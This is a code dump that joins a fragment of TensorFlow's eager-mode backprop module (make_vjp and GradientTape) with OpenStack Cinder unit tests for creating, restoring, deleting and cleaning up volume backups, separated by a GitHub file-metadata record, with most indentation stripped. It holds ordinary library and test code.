f: function to be differentiated. If `f` returns a scalar, this scalar will
be differentiated. If `f` returns a tensor or list of tensors, by default
a scalar will be computed by adding all their values to produce a single
scalar. If desired, the tensors can be elementwise multiplied by the
tensors passed as the `dy` keyword argument to the returned gradient
function.
params: list of parameter names of f or list of integers indexing the
parameters with respect to which we'll differentiate. Passing `None`
differentiates with respect to all parameters.
  Returns:
    function which, when called, returns the value of f and the gradient
    of f with respect to all of `params`. The function takes an extra optional
    keyword argument "dy". Setting it allows computation of vector jacobian
    products for vectors other than the vector of ones.
Raises:
ValueError: if the params are not all strings or all integers.
"""
def decorated(*args, **kwds):
"""Computes the value and gradient of the decorated function."""
dy = kwds.pop("dy", None)
if kwds:
raise ValueError("Functions to be differentiated cannot "
"receive keyword arguments.")
val, vjp = make_vjp(f, params)(*args, **kwds)
return val, vjp(dy=dy)
return decorated
def make_vjp(f, params=None, persistent=True):
"""Returns a function that computes f and is vjp w.r.t. params.
The term "vjp" here is an abbreviation for vector-jacobian product.
Args:
f: the function to be differentiated.
params: the parameters (numbers or names) to differentiate with respect to.
A value of None will differentiate with respect to all parameters.
persistent: Boolean controlling whether the VJP function can be re-used.
Must be True or False.
Returns:
A function, which when called, returns a tuple (value, vjp), where:
- value is the result of calling f.
- vjp is a function, which takes a vector as an argument and
returns the product of that vector with the Jacobian of f.
Providing no argument to vjp is equivalent to providing a
vector of ones.
For example,
```python
def f(x):
return x * x
wrapped_fn = tfe.make_vjp(f)
result, vjp = wrapped_fn(tf.constant(3.0))
# result is 9.0
  vjp()  # the vjp function returns 6.0
  ```
Raises:
ValueError: if `f` returns None.
"""
def decorated(*args, **kwds):
"""Computes the value and gradient of the decorated function."""
parameter_positions = _get_arg_spec(f, params, args)
assert not kwds, "The gradient function can't take keyword arguments."
this_tape = tape.push_new_tape(persistent=persistent)
try:
sources = []
args = [
ops.convert_to_tensor(args[i])
if i in parameter_positions else args[i]
for i in range(len(args))
]
args = _ensure_unique_tensor_objects(parameter_positions, args)
for i in parameter_positions:
sources.append(args[i])
tape.watch(args[i])
result = f(*args)
if result is None:
raise ValueError("Cannot differentiate a function that returns None; "
"did you forget to return a value from {}?".format(
f.__name__))
flat_result = nest.flatten(result)
flat_result = [gen_array_ops.identity(x) for x in flat_result]
result = nest.pack_sequence_as(result, flat_result)
finally:
tape.pop_tape(this_tape)
def vjp(dy=None):
if dy is not None:
dy = [ops.convert_to_tensor(x) for x in nest.flatten(dy)]
return imperative_grad.imperative_grad(
_default_vspace, this_tape, nest.flatten(result), sources,
output_gradients=dy)
return result, vjp
return decorated
def _aggregate_grads(gradients):
"""Aggregate gradients from multiple sources.
Args:
gradients: A list of 'Tensor' or 'IndexedSlices' gradients.
Returns:
If 'gradients' only has 'Tensor', returns an aggregated 'Tensor'.
Otherwise returns an aggregated 'IndexedSlices'.
"""
assert gradients, "No gradients to aggregate"
if len(gradients) == 1:
return gradients[0]
if all([isinstance(g, ops.Tensor) for g in gradients]):
return math_ops.add_n(gradients)
else:
assert all([isinstance(g, (ops.Tensor, ops.IndexedSlices))
for g in gradients])
indexed_slices_list = []
for grad in gradients:
# TODO(xpan): Support nested IndexedSlices and core IndexedSlices
if isinstance(grad, ops.Tensor):
indexed_slices = ops.IndexedSlices(
grad,
math_ops.range(grad.shape[0]),
constant_op.constant(grad.shape.as_list()))
indexed_slices_list.append(indexed_slices)
else:
indexed_slices_list.append(grad)
# Dense shapes from all gradients should be the same.
dense_shape = indexed_slices_list[0].dense_shape
# For simplicity now, always cast to int64.
indices = array_ops.concat([math_ops.cast(x.indices, dtypes.int64)
for x in indexed_slices_list], 0)
values = array_ops.concat([x.values for x in indexed_slices_list], 0)
return ops.IndexedSlices(values, indices, dense_shape)
def _num_elements(grad):
"""The number of elements in the `grad` tensor."""
if isinstance(grad, ops.Tensor):
return functools.reduce(operator.mul, grad._shape_tuple(), 1) # pylint: disable=protected-access
if isinstance(grad, ops.IndexedSlices):
return functools.reduce(operator.mul, grad.values._shape_tuple(), 1) # pylint: disable=protected-access
raise ValueError("`grad` not a Tensor or IndexedSlices.")
_zeros_cache = context._TensorCache() # pylint: disable=protected-access
def _fast_fill(value, shape, dtype):
return array_ops.fill(shape, constant_op.constant(value, dtype=dtype))
def _zeros(shape, dtype):
"""Wraps array_ops.zeros to cache last zero for a given shape and dtype."""
device = context.context().device_name
if dtype == dtypes.variant:
# TODO(apassos): need to save enough information about variant tensors to do
# a zeros
return None
cache_key = shape, dtype, device
cached = _zeros_cache.get(cache_key)
if cached is None:
cached = _fast_fill(0, shape, dtype)
_zeros_cache.put(cache_key, cached)
return cached
def _ones(shape, dtype):
if shape == (): # pylint: disable=g-explicit-bool-comparison
return constant_op.constant(1, dtype=dtype)
return _fast_fill(1, shape, dtype)
_default_vspace = imperative_grad.VSpace(
num_elements_fn=_num_elements,
aggregate_fn=_aggregate_grads,
tensor_id=ops.tensor_id,
zeros=_zeros,
ones=_ones)
@tf_export("GradientTape")
class GradientTape(object):
"""Record operations for automatic differentiation.
Operations are recorded if they are executed within this context manager and
at least one of their inputs is being "watched".
Variables (created by `tf.contrib.eager.Variable` or @{tf.get_variable})
are automatically watched. Tensors can be manually watched by invoking the
`watch`
method on this context manager.
For example, consider the function `y = x * x`. The gradient at `x = 3.0` can
be computed as:
```python
x = tf.constant(3.)
with tfe.GradientTape() as g:
g.watch(x)
y = x * x
grad = g.gradient(y, [x])[0] # Will compute to 6.0
```
GradientTapes can be nested to compute higher-order derivatives. For example,
```python
x = tf.constant(3.0)
with tfe.GradientTape() as g:
with tfe.GradientTape() as gg:
gg.watch(x)
y = x * x
dy_dx = gg.gradient(y, [x])[0] # Will compute to 6.0
d2y_dx2 = g.gradient(dy_dx, [x])[0] # Will compute to 2.0
```
By default, the resources held by a GradientTape are released as soon as
GradientTape.gradient() method is called. To compute multiple gradients over
the same computation, create a persistent gradient tape. This allows multiple
calls to the gradient() method as resources are released when the tape object
is garbage collected. For example:
```python
x = tf.constant(3.0)
with tfe.GradientTape(persistent=True) as g:
g.watch(x)
y = x * x
z = y * y
  dz_dx = g.gradient(z, [x])[0]  # 108.0 (4*x^3 at x = 3)
  dy_dx = g.gradient(y, [x])[0]  # 6.0
del g # Drop the reference to the tape
"""
def __init__(self, persistent=False):
"""Creates a new GradientTape.
Args:
persistent: Boolean controlling whether a persistent gradient tape
is created. False by default, which means at most one call can
be made to the gradient() method on this object.
"""
self._tape = None
self._persistent = persistent
def __enter__(self):
self._tape = tape.push_new_tape(persistent=self._persistent)
return self
def __exit__(self, typ, value, traceback):
tape.pop_tape(self._tape)
def watch(self, tensor):
"""Ensures that `tensor` is being traced by this tape.
Args:
tensor: a Tensor or list of Tensors.
"""
for t in nest.flatten(tensor):
if isinstance(t, resource_variable_ops.ResourceVariable):
t = t.handle
tape.watch(t)
def watched_variables(self):
# Sorting variables by id, which is monotonically increasing in construction
# order. This ensures unique order across executions.
# TODO(josh11b): Move the sort to the C++ implementation in pywrap_tfe_src.cc.
return list(sorted(self._tape.watched_variables(),
key=lambda v: v.handle._id)) # pylint: disable=protected-access
def gradient(self, target, sources, output_gradients=None):
"""Computes the gradient using operations recorded in context of this tape.
Args:
target: Tensor to be differentiated.
sources: a list of Tensors or Variables. `target` will be differentiated
against elements in `sources`.
output_gradients: a list of gradients, one for each element of
target. Defaults to None.
Returns:
a list of Tensors (or IndexedSlices, or None), one for each element in
`sources`.
Raises:
RuntimeError: if called inside the context of the tape, or if called more
than once on a non-persistent tape.
"""
if self._tape is None:
raise RuntimeError("GradientTape.gradient can only be called once "
"on non-persistent tapes, and "
"only when the context manager has exited.")
sources = [x.handle if isinstance(x, resource_variable_ops.ResourceVariable)
else x
for x in sources]
grad = imperative_grad.imperative_grad(
_default_vspace, self._tape, [target], sources,
output_gradients=output_gradients)
if not self._persistent:
self._tape = None
return grad
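# Editor-added usage sketch, not part of the original module: mirrors the class
# docstring above, computing d(x*x)/dx at x = 3.0 with a non-persistent tape.
# It assumes eager execution is enabled.
def _gradient_tape_sketch():
  x = constant_op.constant(3.0)
  with GradientTape() as g:
    g.watch(x)
    y = x * x
  return g.gradient(y, [x])[0]  # evaluates to 6.0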
| {
"content_hash": "fe2bb0d2dd946e790557ea3dcd425eba",
"timestamp": "",
"source": "github",
"line_count": 745,
"max_line_length": 108,
"avg_line_length": 34.60536912751678,
"alnum_prop": 0.6677398083860208,
"repo_name": "Xeralux/tensorflow",
"id": "06e11f6ef9985e078b98c5f1e3d9d0edeef2df56",
"size": "26470",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/python/eager/backprop.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "9274"
},
{
"name": "C",
"bytes": "340972"
},
{
"name": "C++",
"bytes": "39479562"
},
{
"name": "CMake",
"bytes": "194702"
},
{
"name": "Go",
"bytes": "1046987"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "567239"
},
{
"name": "Jupyter Notebook",
"bytes": "1940883"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "48231"
},
{
"name": "Objective-C",
"bytes": "12456"
},
{
"name": "Objective-C++",
"bytes": "94385"
},
{
"name": "PHP",
"bytes": "2140"
},
{
"name": "Perl",
"bytes": "6179"
},
{
"name": "Perl 6",
"bytes": "1357"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "33675501"
},
{
"name": "Ruby",
"bytes": "533"
},
{
"name": "Shell",
"bytes": "425916"
}
],
"symlink_target": ""
} |
"""Tests for Backup code."""
import ddt
import tempfile
import uuid
import mock
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import timeutils
from cinder.backup import api
from cinder.backup import manager
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder import test
from cinder.tests.unit.backup import fake_service_with_verify as fake_service
from cinder.volume.drivers import lvm
CONF = cfg.CONF
class FakeBackupException(Exception):
pass
class BaseBackupTest(test.TestCase):
def setUp(self):
super(BaseBackupTest, self).setUp()
vol_tmpdir = tempfile.mkdtemp()
self.flags(volumes_dir=vol_tmpdir)
self.backup_mgr = importutils.import_object(CONF.backup_manager)
self.backup_mgr.host = 'testhost'
self.ctxt = context.get_admin_context()
self.backup_mgr.driver.set_initialized()
def _create_backup_db_entry(self, volume_id=1, display_name='test_backup',
display_description='this is a test backup',
container='volumebackups',
status='creating',
size=1,
object_count=0,
project_id='fake',
service=None,
temp_volume_id=None,
temp_snapshot_id=None):
"""Create a backup entry in the DB.
Return the entry ID
"""
kwargs = {}
kwargs['volume_id'] = volume_id
kwargs['user_id'] = 'fake'
kwargs['project_id'] = project_id
kwargs['host'] = 'testhost'
kwargs['availability_zone'] = '1'
kwargs['display_name'] = display_name
kwargs['display_description'] = display_description
kwargs['container'] = container
kwargs['status'] = status
kwargs['fail_reason'] = ''
kwargs['service'] = service or CONF.backup_driver
kwargs['snapshot'] = False
kwargs['parent_id'] = None
kwargs['size'] = size
kwargs['object_count'] = object_count
kwargs['temp_volume_id'] = temp_volume_id
kwargs['temp_snapshot_id'] = temp_snapshot_id
backup = objects.Backup(context=self.ctxt, **kwargs)
backup.create()
return backup
def _create_volume_db_entry(self, display_name='test_volume',
display_description='this is a test volume',
status='backing-up',
previous_status='available',
size=1):
"""Create a volume entry in the DB.
Return the entry ID
"""
vol = {}
vol['size'] = size
vol['host'] = 'testhost'
vol['user_id'] = 'fake'
vol['project_id'] = 'fake'
vol['status'] = status
vol['display_name'] = display_name
vol['display_description'] = display_description
vol['attach_status'] = 'detached'
vol['availability_zone'] = '1'
vol['previous_status'] = previous_status
return db.volume_create(self.ctxt, vol)['id']
def _create_snapshot_db_entry(self, display_name='test_snapshot',
display_description='test snapshot',
status='available',
size=1,
volume_id='1',
provider_location=None):
"""Create a snapshot entry in the DB.
Return the entry ID.
"""
kwargs = {}
kwargs['size'] = size
kwargs['host'] = 'testhost'
kwargs['user_id'] = 'fake'
kwargs['project_id'] = 'fake'
kwargs['status'] = status
kwargs['display_name'] = display_name
kwargs['display_description'] = display_description
kwargs['volume_id'] = volume_id
kwargs['cgsnapshot_id'] = None
kwargs['volume_size'] = size
kwargs['provider_location'] = provider_location
snapshot_obj = objects.Snapshot(context=self.ctxt, **kwargs)
snapshot_obj.create()
return snapshot_obj
def _create_volume_attach(self, volume_id):
values = {'volume_id': volume_id,
'attach_status': 'attached', }
attachment = db.volume_attach(self.ctxt, values)
db.volume_attached(self.ctxt, attachment['id'], None, 'testhost',
'/dev/vd0')
def _create_exported_record_entry(self, vol_size=1, exported_id=None):
"""Create backup metadata export entry."""
vol_id = self._create_volume_db_entry(status='available',
size=vol_size)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
if exported_id is not None:
backup.id = exported_id
export = self.backup_mgr.export_record(self.ctxt, backup)
return export
def _create_export_record_db_entry(self,
volume_id='0000',
status='creating',
project_id='fake',
backup_id=None):
"""Create a backup entry in the DB.
Return the entry ID
"""
kwargs = {}
kwargs['volume_id'] = volume_id
kwargs['user_id'] = 'fake'
kwargs['project_id'] = project_id
kwargs['status'] = status
if backup_id:
kwargs['id'] = backup_id
backup = objects.BackupImport(context=self.ctxt, **kwargs)
backup.create()
return backup
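# BackupTestCase drives the manager-level paths: init_host() cleanup of stuck
# resources, the create/restore/delete flows, record export/import and the
# force-delete capability check.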
@ddt.ddt
class BackupTestCase(BaseBackupTest):
"""Test Case for backups."""
@mock.patch.object(lvm.LVMVolumeDriver, 'delete_snapshot')
@mock.patch.object(lvm.LVMVolumeDriver, 'delete_volume')
def test_init_host(self, mock_delete_volume, mock_delete_snapshot):
"""Test stuck volumes and backups.
Make sure stuck volumes and backups are reset to correct
states when backup_manager.init_host() is called
"""
vol1_id = self._create_volume_db_entry()
self._create_volume_attach(vol1_id)
db.volume_update(self.ctxt, vol1_id, {'status': 'backing-up'})
vol2_id = self._create_volume_db_entry()
self._create_volume_attach(vol2_id)
db.volume_update(self.ctxt, vol2_id, {'status': 'restoring-backup'})
vol3_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol3_id, {'status': 'available'})
vol4_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol4_id, {'status': 'backing-up'})
temp_vol_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, temp_vol_id, {'status': 'available'})
vol5_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol5_id, {'status': 'backing-up'})
temp_snap = self._create_snapshot_db_entry()
temp_snap.status = 'available'
temp_snap.save()
vol6_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol6_id, {'status': 'restoring-backup'})
backup1 = self._create_backup_db_entry(status='creating',
volume_id=vol1_id)
backup2 = self._create_backup_db_entry(status='restoring',
volume_id=vol2_id)
backup3 = self._create_backup_db_entry(status='deleting',
volume_id=vol3_id)
self._create_backup_db_entry(status='creating',
volume_id=vol4_id,
temp_volume_id=temp_vol_id)
self._create_backup_db_entry(status='creating',
volume_id=vol5_id,
temp_snapshot_id=temp_snap.id)
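        # init_host() is expected to reset volumes stuck in 'backing-up' or
        # 'restoring-backup', fail in-flight backups, finish pending deletes
        # and remove leftover temporary volumes/snapshots; the assertions
        # below check each of those transitions.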
self.backup_mgr.init_host()
vol1 = db.volume_get(self.ctxt, vol1_id)
self.assertEqual('available', vol1['status'])
vol2 = db.volume_get(self.ctxt, vol2_id)
self.assertEqual('error_restoring', vol2['status'])
vol3 = db.volume_get(self.ctxt, vol3_id)
self.assertEqual('available', vol3['status'])
vol4 = db.volume_get(self.ctxt, vol4_id)
self.assertEqual('available', vol4['status'])
vol5 = db.volume_get(self.ctxt, vol5_id)
self.assertEqual('available', vol5['status'])
vol6 = db.volume_get(self.ctxt, vol6_id)
self.assertEqual('error_restoring', vol6['status'])
backup1 = db.backup_get(self.ctxt, backup1.id)
self.assertEqual('error', backup1['status'])
backup2 = db.backup_get(self.ctxt, backup2.id)
self.assertEqual('available', backup2['status'])
self.assertRaises(exception.BackupNotFound,
db.backup_get,
self.ctxt,
backup3.id)
self.assertTrue(mock_delete_volume.called)
self.assertTrue(mock_delete_snapshot.called)
@mock.patch('cinder.objects.backup.BackupList.get_all_by_host')
@mock.patch('cinder.manager.SchedulerDependentManager._add_to_threadpool')
def test_init_host_with_service_inithost_offload(self,
mock_add_threadpool,
mock_get_all_by_host):
self.override_config('backup_service_inithost_offload', True)
vol1_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol1_id, {'status': 'available'})
backup1 = self._create_backup_db_entry(status='deleting',
volume_id=vol1_id)
vol2_id = self._create_volume_db_entry()
db.volume_update(self.ctxt, vol2_id, {'status': 'available'})
backup2 = self._create_backup_db_entry(status='deleting',
volume_id=vol2_id)
mock_get_all_by_host.return_value = [backup1, backup2]
self.backup_mgr.init_host()
calls = [mock.call(self.backup_mgr.delete_backup, mock.ANY, backup1),
mock.call(self.backup_mgr.delete_backup, mock.ANY, backup2)]
mock_add_threadpool.assert_has_calls(calls, any_order=True)
self.assertEqual(2, mock_add_threadpool.call_count)
def test_init_host_handles_exception(self):
"""Test that exception in cleanup is handled."""
self.mock_object(self.backup_mgr, '_init_volume_driver')
mock_cleanup = self.mock_object(
self.backup_mgr,
'_cleanup_incomplete_backup_operations')
mock_cleanup.side_effect = [Exception]
self.assertIsNone(self.backup_mgr.init_host())
def test_cleanup_incomplete_backup_operations_with_exceptions(self):
"""Test cleanup resilience in the face of exceptions."""
fake_volume_list = [{'id': 'vol1'}, {'id': 'vol2'}]
mock_volume_get_by_host = self.mock_object(
db, 'volume_get_all_by_host')
mock_volume_get_by_host.return_value = fake_volume_list
mock_volume_cleanup = self.mock_object(
self.backup_mgr, '_cleanup_one_volume')
mock_volume_cleanup.side_effect = [Exception]
fake_backup_list = [{'id': 'bkup1'}, {'id': 'bkup2'}, {'id': 'bkup3'}]
mock_backup_get_by_host = self.mock_object(
objects.BackupList, 'get_all_by_host')
mock_backup_get_by_host.return_value = fake_backup_list
mock_backup_cleanup = self.mock_object(
self.backup_mgr, '_cleanup_one_backup')
mock_backup_cleanup.side_effect = [Exception]
mock_temp_cleanup = self.mock_object(
self.backup_mgr, '_cleanup_temp_volumes_snapshots_for_one_backup')
mock_temp_cleanup.side_effect = [Exception]
self.assertIsNone(
self.backup_mgr._cleanup_incomplete_backup_operations(
self.ctxt))
self.assertEqual(len(fake_volume_list), mock_volume_cleanup.call_count)
self.assertEqual(len(fake_backup_list), mock_backup_cleanup.call_count)
self.assertEqual(len(fake_backup_list), mock_temp_cleanup.call_count)
def test_cleanup_one_backing_up_volume(self):
"""Test cleanup_one_volume for volume status 'backing-up'."""
mock_get_manager = self.mock_object(
self.backup_mgr, '_get_manager')
mock_get_manager.return_value = 'fake_manager'
volume_id = self._create_volume_db_entry(status='backing-up',
previous_status='available')
volume = db.volume_get(self.ctxt, volume_id)
self.backup_mgr._cleanup_one_volume(self.ctxt, volume)
volume = db.volume_get(self.ctxt, volume_id)
self.assertEqual('available', volume['status'])
def test_cleanup_one_restoring_backup_volume(self):
"""Test cleanup_one_volume for volume status 'restoring-backup'."""
mock_get_manager = self.mock_object(
self.backup_mgr, '_get_manager')
mock_get_manager.return_value = 'fake_manager'
volume_id = self._create_volume_db_entry(status='restoring-backup')
volume = db.volume_get(self.ctxt, volume_id)
self.backup_mgr._cleanup_one_volume(self.ctxt, volume)
volume = db.volume_get(self.ctxt, volume_id)
self.assertEqual('error_restoring', volume['status'])
def test_cleanup_one_creating_backup(self):
"""Test cleanup_one_backup for volume status 'creating'."""
backup = self._create_backup_db_entry(status='creating')
self.backup_mgr._cleanup_one_backup(self.ctxt, backup)
self.assertEqual('error', backup.status)
def test_cleanup_one_restoring_backup(self):
"""Test cleanup_one_backup for volume status 'restoring'."""
backup = self._create_backup_db_entry(status='restoring')
self.backup_mgr._cleanup_one_backup(self.ctxt, backup)
self.assertEqual('available', backup.status)
def test_cleanup_one_deleting_backup(self):
"""Test cleanup_one_backup for volume status 'deleting'."""
backup = self._create_backup_db_entry(status='deleting')
self.backup_mgr._cleanup_one_backup(self.ctxt, backup)
self.assertRaises(exception.BackupNotFound,
db.backup_get,
self.ctxt,
backup.id)
def test_detach_all_attachments_handles_exceptions(self):
"""Test detach_all_attachments with exceptions."""
mock_log = self.mock_object(manager, 'LOG')
mock_volume_mgr = mock.Mock()
mock_detach_volume = mock_volume_mgr.detach_volume
mock_detach_volume.side_effect = [Exception]
fake_attachments = [
{
'id': 'attachment1',
'attached_host': 'testhost',
'instance_uuid': None,
},
{
'id': 'attachment2',
'attached_host': 'testhost',
'instance_uuid': None,
}
]
fake_volume = {
'id': 'fake_volume_id',
'volume_attachment': fake_attachments
}
self.backup_mgr._detach_all_attachments(self.ctxt,
mock_volume_mgr,
fake_volume)
self.assertEqual(len(fake_attachments), mock_log.exception.call_count)
@ddt.data(KeyError, exception.VolumeNotFound)
def test_cleanup_temp_volumes_snapshots_for_one_backup_volume_not_found(
self, err):
"""Ensure we handle missing volume for a backup."""
mock_volume_get = self.mock_object(db, 'volume_get')
mock_volume_get.side_effect = [err]
backup = self._create_backup_db_entry(status='creating')
self.assertIsNone(
self.backup_mgr._cleanup_temp_volumes_snapshots_for_one_backup(
self.ctxt,
backup))
def test_cleanup_temp_snapshot_for_one_backup_not_found(self):
"""Ensure we handle missing temp snapshot for a backup."""
mock_delete_snapshot = self.mock_object(
lvm.LVMVolumeDriver, 'delete_snapshot')
vol1_id = self._create_volume_db_entry()
self._create_volume_attach(vol1_id)
db.volume_update(self.ctxt, vol1_id, {'status': 'backing-up'})
backup = self._create_backup_db_entry(status='error',
volume_id=vol1_id,
temp_snapshot_id='fake')
self.assertIsNone(
self.backup_mgr._cleanup_temp_volumes_snapshots_for_one_backup(
self.ctxt,
backup))
self.assertFalse(mock_delete_snapshot.called)
self.assertIsNone(backup.temp_snapshot_id)
backup.destroy()
db.volume_destroy(self.ctxt, vol1_id)
def test_cleanup_temp_volume_for_one_backup_not_found(self):
"""Ensure we handle missing temp volume for a backup."""
mock_delete_volume = self.mock_object(
lvm.LVMVolumeDriver, 'delete_volume')
vol1_id = self._create_volume_db_entry()
self._create_volume_attach(vol1_id)
db.volume_update(self.ctxt, vol1_id, {'status': 'backing-up'})
backup = self._create_backup_db_entry(status='error',
volume_id=vol1_id,
temp_volume_id='fake')
self.assertIsNone(
self.backup_mgr._cleanup_temp_volumes_snapshots_for_one_backup(
self.ctxt,
backup))
self.assertFalse(mock_delete_volume.called)
self.assertIsNone(backup.temp_volume_id)
backup.destroy()
db.volume_destroy(self.ctxt, vol1_id)
def test_create_backup_with_bad_volume_status(self):
"""Test creating a backup from a volume with a bad status."""
vol_id = self._create_volume_db_entry(status='restoring', size=1)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.assertRaises(exception.InvalidVolume,
self.backup_mgr.create_backup,
self.ctxt,
backup)
def test_create_backup_with_bad_backup_status(self):
"""Test creating a backup with a backup with a bad status."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.create_backup,
self.ctxt,
backup)
@mock.patch('%s.%s' % (CONF.volume_driver, 'backup_volume'))
def test_create_backup_with_error(self, _mock_volume_backup):
"""Test error handling when error occurs during backup creation."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(volume_id=vol_id)
_mock_volume_backup.side_effect = FakeBackupException('fake')
self.assertRaises(FakeBackupException,
self.backup_mgr.create_backup,
self.ctxt,
backup)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('available', vol['status'])
self.assertEqual('error_backing-up', vol['previous_status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
self.assertTrue(_mock_volume_backup.called)
@mock.patch('%s.%s' % (CONF.volume_driver, 'backup_volume'))
def test_create_backup(self, _mock_volume_backup):
"""Test normal backup creation."""
vol_size = 1
vol_id = self._create_volume_db_entry(size=vol_size)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.backup_mgr.create_backup(self.ctxt, backup)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('available', vol['status'])
self.assertEqual('backing-up', vol['previous_status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
self.assertEqual(vol_size, backup['size'])
self.assertTrue(_mock_volume_backup.called)
@mock.patch('cinder.volume.utils.notify_about_backup_usage')
@mock.patch('%s.%s' % (CONF.volume_driver, 'backup_volume'))
def test_create_backup_with_notify(self, _mock_volume_backup, notify):
"""Test normal backup creation with notifications."""
vol_size = 1
vol_id = self._create_volume_db_entry(size=vol_size)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.backup_mgr.create_backup(self.ctxt, backup)
self.assertEqual(2, notify.call_count)
def test_restore_backup_with_bad_volume_status(self):
"""Test error handling.
Test error handling when restoring a backup to a volume
with a bad status.
"""
vol_id = self._create_volume_db_entry(status='available', size=1)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.assertRaises(exception.InvalidVolume,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
def test_restore_backup_with_bad_backup_status(self):
"""Test error handling.
Test error handling when restoring a backup with a backup
with a bad status.
"""
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=1)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('error', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
@mock.patch('%s.%s' % (CONF.volume_driver, 'restore_backup'))
def test_restore_backup_with_driver_error(self, _mock_volume_restore):
"""Test error handling when an error occurs during backup restore."""
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=1)
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id)
_mock_volume_restore.side_effect = FakeBackupException('fake')
self.assertRaises(FakeBackupException,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('error_restoring', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
self.assertTrue(_mock_volume_restore.called)
def test_restore_backup_with_bad_service(self):
"""Test error handling.
Test error handling when attempting a restore of a backup
with a different service to that used to create the backup.
"""
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=1)
service = 'cinder.tests.backup.bad_service'
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id,
service=service)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.restore_backup,
self.ctxt,
backup,
vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('error', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
@mock.patch('%s.%s' % (CONF.volume_driver, 'restore_backup'))
def test_restore_backup(self, _mock_volume_restore):
"""Test normal backup restoration."""
vol_size = 1
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=vol_size)
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id)
self.backup_mgr.restore_backup(self.ctxt, backup, vol_id)
vol = db.volume_get(self.ctxt, vol_id)
self.assertEqual('available', vol['status'])
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
self.assertTrue(_mock_volume_restore.called)
@mock.patch('cinder.volume.utils.notify_about_backup_usage')
@mock.patch('%s.%s' % (CONF.volume_driver, 'restore_backup'))
def test_restore_backup_with_notify(self, _mock_volume_restore, notify):
"""Test normal backup restoration with notifications."""
vol_size = 1
vol_id = self._create_volume_db_entry(status='restoring-backup',
size=vol_size)
backup = self._create_backup_db_entry(status='restoring',
volume_id=vol_id)
self.backup_mgr.restore_backup(self.ctxt, backup, vol_id)
self.assertEqual(2, notify.call_count)
def test_delete_backup_with_bad_backup_status(self):
"""Test error handling.
Test error handling when deleting a backup with a backup
with a bad status.
"""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.delete_backup,
self.ctxt,
backup)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_delete_backup_with_error(self):
"""Test error handling when an error occurs during backup deletion."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
display_name='fail_on_delete',
volume_id=vol_id)
self.assertRaises(IOError,
self.backup_mgr.delete_backup,
self.ctxt,
backup)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_delete_backup_with_bad_service(self):
"""Test error handling.
Test error handling when attempting a delete of a backup
with a different service to that used to create the backup.
"""
vol_id = self._create_volume_db_entry(size=1)
service = 'cinder.tests.backup.bad_service'
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id,
service=service)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.delete_backup,
self.ctxt,
backup)
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_delete_backup_with_no_service(self):
"""Test error handling.
Test error handling when attempting a delete of a backup
with no service defined for that backup, relates to bug #1162908
"""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id)
backup.service = None
backup.save()
self.backup_mgr.delete_backup(self.ctxt, backup)
def test_delete_backup(self):
"""Test normal backup deletion."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id)
self.backup_mgr.delete_backup(self.ctxt, backup)
